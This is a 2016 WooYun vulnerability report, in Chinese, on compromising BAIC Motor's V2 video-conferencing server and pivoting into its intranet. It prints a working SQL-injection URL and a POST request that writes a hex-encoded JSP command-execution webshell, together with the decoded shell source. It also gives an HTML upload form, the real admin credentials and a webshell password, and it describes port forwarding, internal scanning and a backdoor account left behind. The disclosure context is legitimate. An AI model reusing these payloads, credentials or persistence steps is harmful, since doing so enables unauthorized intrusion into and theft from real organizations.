当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0192291

漏洞标题:我是如何测试北京汽车一系列内部服务安全的(dba权限/root帐号/内网遨游)

相关厂商:北京汽车股份有限公司

漏洞作者: DeadSea

提交时间:2016-04-04 22:16

修复时间:2016-05-20 10:50

公开时间:2016-05-20 10:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-04: 细节已通知厂商并且等待厂商处理中
2016-04-05: 厂商已经确认,细节仅向厂商公开
2016-04-15: 细节向核心白帽子及相关领域专家公开
2016-04-25: 细节向普通白帽子公开
2016-05-05: 细节向实习白帽子公开
2016-05-20: 细节向公众公开

简要描述:

mark

详细说明:

测试目标

http://video.baicmotor.com


发现是V2视频会议系统
于是乎在乌云搜索了下。发现有人提交过一个sql注入外加getshell

http://******/bugs/wooyun-2010-0143276


注入出了root权限账户

1.png


http://video.baicmotor.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user%28%29,3,version%28%29,5%23


然后放到sqlmap跑下 后面加个leve 2 才能跑的出来,感谢zone的小伙伴出的主意

1.png


root权限。
在跑下管理员帐号

admin/baic12345678


成功进入后

1.png


让我们研究研究getshell

POST /Conf/jsp/systembulletin/bulletinAction.do?operator=details HTTP/1.1
Host: video.baicmotor.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=utf-8
Content-Length: 1171
Cookie: JSESSIONID=804BDEBF691850876C7B73972FE2024B; Hm_lvt_74a2fe33808be9e788342930391b2bf4=1459677986; JSESSIONID=FE67B91450FF759C19F39F7C8FBBA097
Connection: keep-alive
sysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23


这段代码的意思就是把cmd.jsp写入root目录 因为都是默认的
我想上传一句话,这个我弄了半天。最后才知道他是利用了16位进制加密

3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E


解密后是

<%@ page contentType="text/html; charset=GBK" %>
<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s +"\r\n"; } } catch(IOException e) { e.printStackTrace(); } } 
out.println(output);%>


然后我就屁颠屁颠的跑去找了个jsp的一句话
发现各种加密后上传不上去全是500
然后想到了,可以利用html写个poc

<form action="http://video.baicmotor.com/7.jsp?f=1.jsp" method="post"> <textarea name=c cols=120 rows=10 width=45>your code</textarea><BR><center><br> <input type=submit 
value="提交"> </form>


直接写入,

http://video.baicmotor.com/s.jsp

密码023
然后就是提权了

1.png


幸福来的太突然了,sy权限,我呵呵了。你以为就这么简单吗?

1.png


内网呀,大兄弟。我连内网是什么都不懂,所以问了几个朋友。跟我说了一些之后就操刀上马
先转发端口到自己的服务器上

1.png


在开启扫描器各种扫内网IP 10.10.1.1~10.10.1.255
内部OA

1.png


内部管理系统

1.png


防泄漏系统

1.png


还有122个内部系统就不一一贴出来了

1.png


服务器帐号sea$ 密码sea 管理员记得删除

漏洞证明:

1.png

修复方案:

打补丁

版权声明:转载请注明来源 DeadSea@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-04-05 10:44

厂商回复:

感谢你的努力。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-04-06 01:04 | DeadSea ( 普通白帽子 | Rank:261 漏洞数:62 | 本人外形俊朗、眉清目秀、玉树临风、有明星...)

    告诉我为何只有5rank

  2. 2016-04-25 10:52 | 小红猪 ( 普通白帽子 | Rank:322 漏洞数:58 | little red pig!)

    感谢你的努力